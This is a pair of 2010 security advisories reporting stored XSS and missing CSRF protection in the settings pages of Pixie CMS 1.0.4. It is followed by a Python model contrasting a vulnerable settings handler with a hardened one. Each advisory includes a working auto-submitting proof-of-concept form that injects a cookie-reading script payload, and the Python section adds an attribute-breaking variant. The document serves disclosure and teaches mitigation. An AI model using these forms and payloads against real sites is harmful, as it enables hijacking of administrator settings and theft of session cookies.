Stored XSS vulnerability in Pixie

2010-07-15 advisory
Vulnerability ID: HTB22469
Reference: 
http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
An attacker can cause arbitrary JavaScript to execute in the browsers of users 
of the vulnerable application.

The vulnerability exists because the Pixie core settings saving script 
(admin/index.php?s=settings&x=pixie) fails to sanitize the user-supplied 
sysmess (system message) field: the value is stored as submitted and later 
rendered into the page unescaped, so script tags in it are executed whenever 
the message is displayed. Because the settings handler lives in the admin area, 
the PoC below delivers the payload through a cross-site auto-submitted form; the 
form carries no anti-forgery token, so an authenticated administrator who merely 
visits the attacker's page saves the payload with no further interaction. 
Successful exploitation could result in a compromise of the application, theft 
of cookie-based authentication credentials, and disclosure or modification of 
sensitive data.

The vulnerability can be exploited from a browser. The following PoC (an 
attacker-hosted page that auto-submits the settings form; replace host with the 
target) is available:

<form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&x=pixie" method="post" name="main">
<input type="hidden" name="langu" value="en-gb" />
<input type="hidden" name="time_zone" value="+0" />
<input type="hidden" name="dstime" value="no" />
<input type="hidden" name="dateformat" value="%Oe %B %Y, %H:%M" />
<input type="hidden" name="rte" value="1" />
<input type="hidden" name="logs" value="5" />
<input type="hidden" name="sysmess" value='hello message<script>alert(document.cookie)</script>' />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById('form_addedit_submit').click();
</script>


XSS vulnerability in Pixie

2010-07-15 advisory
Vulnerability ID: HTB22468
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
An attacker can cause arbitrary JavaScript to execute in the browsers of users 
of the vulnerable application.

The vulnerability exists because the site settings saving script 
(admin/index.php?s=settings&x=site) fails to sanitize the user-supplied 
keywords field: the value is stored as submitted and rendered into the site's 
pages unescaped, so script tags in it are executed for every visitor of the 
affected pages. As with the core settings handler, the form is in the admin 
area and carries no anti-forgery token, so the PoC below plants the payload by 
having an authenticated administrator visit an attacker-controlled page. 
Successful exploitation could result in a compromise of the application, theft 
of cookie-based authentication credentials, and disclosure or modification of 
sensitive data.

The vulnerability can be exploited from a browser. The following PoC (an 
attacker-hosted page that auto-submits the settings form; replace host with the 
target) is available:

<form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&x=site" method="post" name="main">
<input type="hidden" name="sitename" value="Pixie" />
<input type="hidden" name="url" value="http://host/" />
<input type="hidden" name="default" value="blog/" />
<input type="hidden" name="keywords" value='key1<script>alert(document.cookie)</script>' />
<input type="hidden" name="site_auth" value="sute author" />
<input type="hidden" name="site_cright" value="copyright" />
<input type="hidden" name="cleanurls" value="yes" />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById('form_addedit_submit').click();
</script>
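
The same two missing controls underlie both advisories on this page: the sysmess field of the core settings handler and the keywords field of the site settings handler are stored unsanitized, and the forms that set them accept cross-site submissions. The following Python model is an added example and not Pixie's own PHP code. It replays the two PoC values against a store-and-echo handler written the way the advisories describe it, then against a hardened version that rejects a save without a valid anti-CSRF token and HTML-escapes on output with the escaping matched to the rendering context (element body for sysmess, attribute value for keywords). The class and function names, the token scheme, the rendered markup and the extra attribute-breaking keywords payload are assumptions for illustration; Pixie's real templates and field handling are not reproduced here.

```python
import html
import hmac
import secrets
from typing import Dict, Optional

# Constructed payloads: the two values used in the advisory PoCs, plus an
# attribute-breaking variant for the keywords field (an assumption of this
# example; the advisory only shows the plain <script> form).
SYSMESS_PAYLOAD = "hello message<script>alert(document.cookie)</script>"
KEYWORDS_PAYLOAD = "key1<script>alert(document.cookie)</script>"
KEYWORDS_ATTR_PAYLOAD = 'key1"><script>alert(document.cookie)</script>'

SETTINGS_FIELDS = ("sysmess", "keywords")


def injects_markup(rendered: str) -> bool:
    """Crude check for the demonstration: a raw <script tag in the output
    means the stored value was rendered as markup rather than as text."""
    return "<script" in rendered.lower()


class VulnerableSettings:
    """Models the behaviour the advisories describe: the settings handler
    stores whatever was POSTed and the templates echo it back unescaped."""

    def __init__(self) -> None:
        self.store: Dict[str, str] = {}

    def save(self, post: Dict[str, str]) -> None:
        # No anti-forgery check, so a cross-site auto-submitted form is enough.
        for field in SETTINGS_FIELDS:
            if field in post:
                self.store[field] = post[field]

    def render_sysmess(self) -> str:
        # Element context: the system message shown in the admin UI (hypothetical markup).
        return '<div class="sysmess">%s</div>' % self.store.get("sysmess", "")

    def render_keywords(self) -> str:
        # Attribute context: site keywords emitted in a <meta> tag (hypothetical markup).
        return '<meta name="keywords" content="%s">' % self.store.get("keywords", "")


class HardenedSettings(VulnerableSettings):
    """Same handler with the two missing controls: an anti-CSRF token checked
    on save, and context-appropriate escaping on output."""

    def __init__(self) -> None:
        super().__init__()
        # Hypothetical per-session token; a real application binds it to the
        # session and embeds it as a hidden field in its own settings form.
        self.csrf_token = secrets.token_hex(16)

    def save(self, post: Dict[str, str]) -> None:
        supplied = post.get("csrf_token", "")
        if not hmac.compare_digest(supplied, self.csrf_token):
            raise PermissionError("settings_edit rejected: missing or invalid anti-CSRF token")
        super().save(post)

    def render_sysmess(self) -> str:
        return '<div class="sysmess">%s</div>' % html.escape(self.store.get("sysmess", ""), quote=True)

    def render_keywords(self) -> str:
        # quote=True also turns " into &quot; so the value cannot close the attribute.
        return '<meta name="keywords" content="%s">' % html.escape(self.store.get("keywords", ""), quote=True)


def exploit_attempt(app: VulnerableSettings, post: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Replay a PoC POST against an app instance. Returns the rendered output,
    or None when the handler refused the request."""
    try:
        app.save(post)
    except PermissionError:
        return None
    return {"sysmess": app.render_sysmess(), "keywords": app.render_keywords()}


if __name__ == "__main__":
    poc = {"sysmess": SYSMESS_PAYLOAD, "keywords": KEYWORDS_ATTR_PAYLOAD}
    print("vulnerable:", exploit_attempt(VulnerableSettings(), poc))
    hardened = HardenedSettings()
    print("hardened, forged request:", exploit_attempt(hardened, poc))
    print("hardened, legitimate request:",
          exploit_attempt(hardened, dict(poc, csrf_token=hardened.csrf_token)))
```

Note that escaping alone would stop the script from executing but would still let a forged request overwrite the administrator's settings; the token check addresses the delivery vector the PoCs rely on, and output escaping addresses the stored XSS itself. Both are needed.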